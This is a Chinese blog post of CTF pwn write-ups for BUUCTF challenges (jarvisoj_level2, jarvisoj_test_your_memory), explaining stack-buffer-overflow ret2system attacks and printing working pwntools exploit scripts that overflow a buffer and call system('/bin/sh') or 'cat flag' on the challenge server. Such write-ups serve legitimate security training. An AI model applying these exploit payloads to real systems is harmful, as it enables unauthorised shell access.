buuctf pwn wp(第二波)花哨点的AAAA系列

最新推荐文章于 2024-09-03 21:44:53 发布
最新推荐文章于 2024-09-03 21:44:53 发布
阅读量430 收藏 1
点赞数
分类专栏: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847969/article/details/104990215
版权
CTF 同时被 2 个专栏收录
22 篇文章 1 订阅
订阅专栏
pwn
15 篇文章 0 订阅
订阅专栏

这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。)
这一波题都是带点花哨的AAAA,(其实也就是没有直接给你,例如存放在.data段上)
另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己写的),但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来写的),所以有些脚本拿的谁的我给忘了(不过这么简单的脚本应该没有大佬介意)等到后面稍微难一点的题目接近我现在的时间线,一般都是标注是参考谁的wp的

jarvisoj_level2

https://blog.csdn.net/qq_43394612/article/details/85407917

main函数,没什么东西,直接点进vulnerable这个函数
在这里插入图片描述
然后看到一个read函数的漏洞
在这里插入图片描述
然后我们查找字符串发现了system 和/bin/sh
在这里插入图片描述
但是遗憾的是并没有这么一个函数,而是存在于.data段上,这个段我们用来存储数据,其实同样是可以调用的
在这里插入图片描述
而且虽然找到了system,但是里面是一个command,这代表这这是系统本身的调用,我们无法直接使用
在这里插入图片描述
那么我们如何拿到flag呢
我们可以看到这个.data数据的位置在0x0804A024,然后我们去查看十六进制字符串
在这里插入图片描述
寻找0804A024这个位置,发现果然在这里有一串/bin/sh,而这里是可以调用的,而位置就是0x0804A024

在这里插入图片描述
所以脚本如下
这是不使用ELF的方法

from pwn import*

elf=ELF("./level2")

a=remote("node3.buuoj.cn","25018")

a.recvuntil("Input:\n")

payload='A'*140+p32(0x08048320)+p32(0x1)+p32(0x0804A024)				##这里的0x1同样可以写成0xdeadbeef,作用为补完字节为8字节

a.send(payload)

a.interactive()

这是使用ELF的方法,主要目的是通过对比体现ELF模块的用法

from pwn import*

elf=ELF("./level2")

a=remote("node3.buuoj.cn","25018")
a.recvuntil("Input:\n")

system_addr=elf.symbols["system"]															##elf.symbols["system"]调用函数system

shell_addr=next(elf.search("/bin/sh"))															##next(elf.search("/bin/sh"))	调用字符串/bin/sh

payload='A'*140+p32(system_addr)+p32(0x1)+p32(shell_addr)					##可以看到我们如果使用ELF片段,就可以不用自己输入地址了

a.send(payload)

a.interactive()

jarvisoj_test_your_memory

https://www.cnblogs.com/luoleqi/p/12385335.html
先看main函数,没什么东西
在这里插入图片描述
然后点进mem_test这个函数,发现scanf有漏洞
在这里插入图片描述
看看s里面需要多少个字符串才能溢出
在这里插入图片描述
可以看到system和cat flag
在这里插入图片描述
可以看到跟上题一样在rodata段
在这里插入图片描述
system同样里面是command
在这里插入图片描述
思路跟上一题一样,所以不赘述了,直接贴脚本

from pwn import *

io =remote('node3.buuoj.cn',25430)


system_plt = 0x8048440
cat_flag = 0x80487e0

payload = 'a' * 23 + p32(system_plt) + p32(0x8048677) + p32(cat_flag)			##需要介绍的是0x8048677同样是填充字符的作用,其实更换任何一个16进制的字符串都是一样的,例如0x8048611
io.sendline(payload)

io.interactive()

ez_pz_hackover_2016

https://blog.csdn.net/qinying001/article/details/104406550/

ciscn_2019_n_8

https://blog.csdn.net/qinying001/article/details/104152797

月阴荒
关注
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2639
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的。 我们双击 s ,看它有多少空...
几道buuctf pwn wp
weixin_44113469的博客
02-07 397
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 476
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
BUUCTF笔记之Pwn部分WP
克格莫(有需要的私信)
06-07 420
二进制是我的弱项,这里记录一些简单的pwn题。 1.test_your_nc
jarvisoj_test_your_memory
最新发布
m0_73743784的博客
09-03 255
感觉好像有问题,题目里本应该先输出一些信息才能输入,所以我第一次尝试的时候前面有个recv(),但是接收不到,只能直接输入了,当然也可能是我还学得太浅吧。
Buuctf pwn1 详细wp
anxiong1803的博客
09-19 2606
目录 程序基本信息 程序溢出 确定返回地址 编写exp脚本 成功getshell 程序基本信息 我们可以看到这是一个64程序,没有保护开启。 程序溢出 gets函数可以读取无限字符,存在栈溢出。 接下来我们测测需要多少字符长度可以溢出...
BUUCTFPWN(WP1)
NANMUZN的博客
01-15 711
buuctf pwn
BUUCTF pwn wp 46 - 50
fa1c4的blog
10-05 279
mrctf2020_shellcode 读汇编, 写进去rax(buf), call rax, 所以直接写shellcode就完事 from pwn import * url, port = "node4.buuoj.cn", 25150 filename = "./mrctf2020_shellcode" elf = ELF(filename) # libc = ELF("./") context(arch="amd64", os="linux") # context(arch="i386", os
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2144
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn rip
weixin_55190422的博客
11-03 367
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF pwn wp 26 - 30
fa1c4的blog
09-27 302
ciscn_2019_s_3 只有read和write, 用SROP打 srop漏洞 参考https://www.anquanke.com/post/id/217081 https://blog.csdn.net/qq_33976344/article/details/115787451 需要注意一下调用方式, 返回直接retn, 所以不弹rbp, 直接弹ret_addr, 另外需要一个gadget设置rax, 程序里是直接提供了的 from pwn import * url, port = 'n
BUUCTF pwn wp 136 - 140
fa1c4的blog
04-28 574
pwnable_asm picoctf_2018_echooo jarvisoj_level6_x64 npuctf_2020_level2 [2020 新春红包题]3
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 349
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
BUU刷题-Pwn-jarvisoj_level3(和攻防世界-Pwn-level3一样)
一个啥也不会的小菜鸡!
07-13 134
[攻防世界-Pwn-level3]]
[Jarvis OJ - PWN]——Test Your Memory
Y_peak的博客
02-16 239
[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad
BUUCTF pwn——jarvisoj_test_your_memory
CNS-Enterprise BCC-1701-J
05-18 144
BUUCTF 做题练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值